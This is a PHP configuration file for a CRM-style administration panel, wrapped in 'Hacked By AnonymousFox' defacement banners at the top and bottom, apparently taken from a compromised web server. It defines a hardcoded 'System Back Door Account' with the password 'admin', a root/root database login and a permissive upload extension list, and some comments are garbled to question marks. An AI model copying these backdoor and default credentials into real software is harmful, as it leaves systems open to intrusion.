Hacked By AnonymousFox
<?
## System Variable ######################################################
$System_Variable_Title = " CRM : Administration Panel";
$System_Variable_Title_FrontEnd = "CRM : Administration Panel";
## System Back Door Account #############################################
$System_BackDoor_UserName = "RootSystem";
$System_BackDoor_Password = "admin";
## Database Definition #################################################
$System_DataBase_HostName = "localhost";
//$System_DataBase_UserName = "root";
//$System_DataBase_Password = "root";
//$System_DataBase_Name = "stat";
$System_DataBase_UserName = "root";
$System_DataBase_Password = "root";
$System_DataBase_Name = "mfu_db";
## Database Table ######################################################
$System_TableName_Staff = "resident";
$System_TableName_Teacher = "teacher";
$System_TableName_Officer = "officer";
$System_TableName_UserOnMenu = "osce_System_UserOnMenu";
$System_TableName_StaffOnPermission = "osce_system_staffonpermission";
$System_TableName_Department = "osce_system_department";
$System_TableName_Menu = "osce_system_menu";
$System_TableName_Menu2 = "osce_system_menu2";
$System_TableName_Menusitemap = "osce_system_menusitemap";
$System_TableName_Country = "osce_system_country";
$System_TableName_MainpageConfig = "osce_system_mainpageconfig";
## File Path ###########################################################
// A relative path with home page ----------
$System_Path_Upload = "upload";
$System_FullPath = "http://localhost/osce";
$System_FullPath_Upload = "http://localhost/osce/upload";
$System_FullPath_IconLibrary = "http://localhost/osce/webengine/images/icon";
// A relative path with module directory ----------
$System_RelativePath = "../../";
$System_RelativePath_Upload = "../../upload";
$System_RelativePath_Upload_Fornt = "../upload";
$System_RelativePath_IconLibrary = "../images/icon";
$myModule_Path_ImageUser = $System_RelativePath_Upload."/account_images";
# พาธย่อย ที่ใช้แบ่งสัดส่วนย่อยๆ ของการเก็บข้อมูล
define ("_PATH_FRONT", $System_RelativePath_Upload_Fornt."/editor/htmlfiles");
define ("_PATH_", $System_RelativePath_Upload."/editor/htmlfiles");
# ??????? ????????????????????? ???????????????
define ("_SUB_PATH_TITLE_", "img_title"); # ????????????????? ???? title ????????????? ?? Module ????????
define ("_SUB_PATH_FILE_ATTACH_", "file_attach"); # ??????????????? ?????????????????????? ???? Object Multiupload
define ("_SUB_PATH_HTML_", ""); # ??????????? HTML ???????????????????????
define ("_SUB_PATH_FILE_ANSWER_", "file_answer"); # ?????????????? ??????????????
define ("_ALLOW_EXTENSION_", "*.jpg;*.jpeg;*.gif;*.png;*.pdf;*.doc;*.xls;*.ppt;*.zip;*.txt;*.mp3;*.wma;*.wmv;*.mpg;*.swf;*.html;*.htm");
?>
Hacked By AnonymousFox1.0, Coded By AnonymousFox